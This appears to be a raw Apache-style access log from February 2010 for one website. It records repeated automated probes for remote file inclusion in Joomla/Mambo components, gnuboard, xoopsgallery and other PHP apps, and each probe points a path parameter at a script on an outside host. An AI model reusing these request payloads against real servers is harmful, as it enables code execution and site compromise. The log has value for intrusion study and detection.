125.141.91.138 - - [08/Feb/2010:04:52:35 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:53:02 -0800] "GET /logs/access_100107.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:53:02 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:53:03 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:13 -0800] "GET /logs/access_100107.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:13 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:13 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:13 -0800] "GET /logs/access_100107.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:13 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:13 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:53:19 -0800] "GET /logs/access_100121.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:53:23 -0800] "GET /logs/access_100121.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:53:23 -0800] "GET /logs///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:53:23 -0800] "GET //gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:53:23 -0800] "GET /logs/access_100201.log%20%20///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:53:23 -0800] "GET /logs/access_100202.log%20%20///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:23 -0800] "GET /logs/access_100121.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:53:51 -0800] "GET /logs/access_100121.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:54:54 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:54:54 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:54:54 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:55:03 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:55:03 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:04:58:22 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:04:58:22 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:04:58:22 -0800] "GET /logs/access_100106.log%20%20/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:58:33 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:58:33 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:58:33 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:58:36 -0800] "GET /logs/access_100127.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:58:36 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:58:36 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:04:59:04 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:04:59:04 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:04:59:05 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:04:59:08 -0800] "GET /logs/access_100120.log%20%20/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:04:59:14 -0800] "GET /logs/access_100130.log//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:04:59:25 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:04:59:25 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:04:59:25 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:29 -0800] "GET /logs/access_100202.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:29 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:29 -0800] "GET /logs/access_100104.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:29 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:30 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:30 -0800] "GET /logs/access_100104.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:30 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:59:30 -0800] "GET /logs/access_100202.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:04:59:34 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:04:59:34 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:04:59:34 -0800] "GET /logs/access_100127.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:39 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:39 -0800] "GET /logs/access_100104.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:39 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:39 -0800] "GET /logs/access_100202.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:41 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:41 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:41 -0800] "GET /logs/access_100104.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:59:41 -0800] "GET /logs/access_100202.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:59:53 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:59:53 -0800] "GET /logs/access_100104.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:59:53 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:59:53 -0800] "GET /logs/access_100202.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:59:59 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:59:59 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:04:59:59 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:05:00:11 -0800] "GET /logs/access_100107.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:05:00:19 -0800] "GET /logs/access_100107.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:05:01:07 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:05:01:08 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:05:01:08 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:01:08 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:01:08 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:01:10 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:01:13 -0800] "GET /logs/access_100103.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.219.40 - - [08/Feb/2010:05:01:38 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.219.40 - - [08/Feb/2010:05:01:38 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.7.219.40 - - [08/Feb/2010:05:01:38 -0800] "GET /logs/access_100106.log/modules/vwar/admin/admin.php?vwar_root=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:05:01:46 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:05:01:46 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:02:04 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:02:04 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:02:04 -0800] "GET /logs/access_100202.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:05:02:04 -0800] "GET /logs/access_100104.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:05:02:07 -0800] "GET /logs/access_100108.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
66.7.219.40 - - [08/Feb/2010:05:02:16 -0800] "GET /logs/access_100116.log/modules/vwar/admin/admin.php?vwar_root=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:05:02:33 -0800] "GET /logs/access_100107.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:02:44 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:02:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:02:44 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:02:59 -0800] "GET /logs/access.log//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:05:02:59 -0800] "GET /logs/access_100103.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:02:59 -0800] "GET /bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:03:00 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:03:00 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:03:00 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:03:00 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:03:21 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:04:03 -0800] "GET /logs/access_100107.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:05:04:15 -0800] "GET /logs/access_100106.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:05:04:30 -0800] "GET /logs/access_100120.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:05:04:57 -0800] "GET /logs/access_100119.log//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:05:15 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:05:15 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:05:15 -0800] "GET /logs/access_100103.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:05:17 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:05:17 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:05:17 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:05:05:32 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:05:05:32 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:05:05:45 -0800] "GET /logs/access_100121.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:05:07:10 -0800] "GET /logs/access_100107.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:05:07:14 -0800] "GET /logs/access_100202.log///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:05:07:14 -0800] "GET /logs/access_100201.log///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:05:07:14 -0800] "GET /logs///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
